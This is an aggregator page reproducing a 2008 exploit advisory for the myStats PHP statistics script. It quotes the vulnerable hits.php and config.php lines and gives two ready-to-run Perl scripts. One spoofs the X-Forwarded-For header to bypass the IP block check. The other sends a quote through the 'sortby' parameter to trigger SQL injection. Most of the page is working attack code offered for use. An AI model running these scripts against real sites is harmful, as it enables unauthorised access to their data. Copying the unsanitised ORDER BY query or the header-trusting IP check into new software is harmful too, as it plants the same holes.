Lucene search

mystats-multi.txt

🗓️ 17 Oct 2008 00:00:00Reported by JosSType

packetstorm🔗 packetstormsecurity.com👁 13 Views

Multiple Remote Vulnerabilities in myStat

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`# myStats (hits.php) Multiple Remote Vulnerabilities Exploit  
# url: http://mywebland.com/  
#  
# Author: JosS  
# mail: sys-project[at]hotmail[dot]com  
# site: http://spanish-hackers.com  
# team: Spanish Hackers Team - [SHT]  
#  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
#  
# Greetz To: All Hackers and milw0rm website  
  
---------------------  
Break System Block IP  
---------------------  
  
<<hits.php>>  
  
7: if (@getenv("HTTP_X_FORWARDED_FOR"))   
  
{ $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); }   
  
else { $u_ip = @getenv("REMOTE_ADDR"); }   
  
  
  
if ($u_ip == BLOCK_IP)   
  
{ return 1;   
  
13: exit; }   
  
<<config.php>>  
  
11: define("BLOCK_IP", "127.0.0.1");   
  
<<exploit.pl>>  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
my $web="http://localhost/hits.php";  
my $ua=LWP::UserAgent->new();  
$ua->default_header('X-Forwarded-For' => "127.1.1.1");  
my $respuesta=HTTP::Request->new(GET=>$web);  
$ua->timeout(30);  
my $response=$ua->request($respuesta);  
$contenido=$response->content;  
if ($response->is_success)  
{  
open(FILE,">>results.txt");  
print FILE "$contenido\n";  
close(FILE);  
print "\n[+] Exploit Succesful!\n\n";  
}  
else  
{  
print "\n[-] Exploit Failed!\n\n";  
}  
  
<<proof of concept>>  
  
$ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP  
  
-------------  
SQL Injection  
-------------  
  
<<hits.php>>  
  
63: if (isset($_GET['sortby']))  
  
{$sortby = $_GET['sortby'];}  
  
else  
  
{ $sortby = 'timestamp' ;}  
  
  
$sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ;  
  
69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error());  
  
<<exploit.pl>>  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
my $web="http://localhost/hits.php?sortby=1'";  
my $ua=LWP::UserAgent->new();  
my $respuesta=HTTP::Request->new(GET=>$web);  
$ua->timeout(30);  
my $response=$ua->request($respuesta);  
$contenido=$response->content;  
if ($response->is_success)  
{  
if($contenido =~ /You have an error in your SQL syntax;/)  
{  
print "\n[+] Exploit Succesful!\n";  
print "\n[+] Content:\n";  
print "$contenido\n\n";  
}  
}  
else  
{  
print "\n[-] Exploit Failed!\n\n";  
}  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

17 Oct 2008 00:00Current

7.4High risk

Vulners AI Score7.4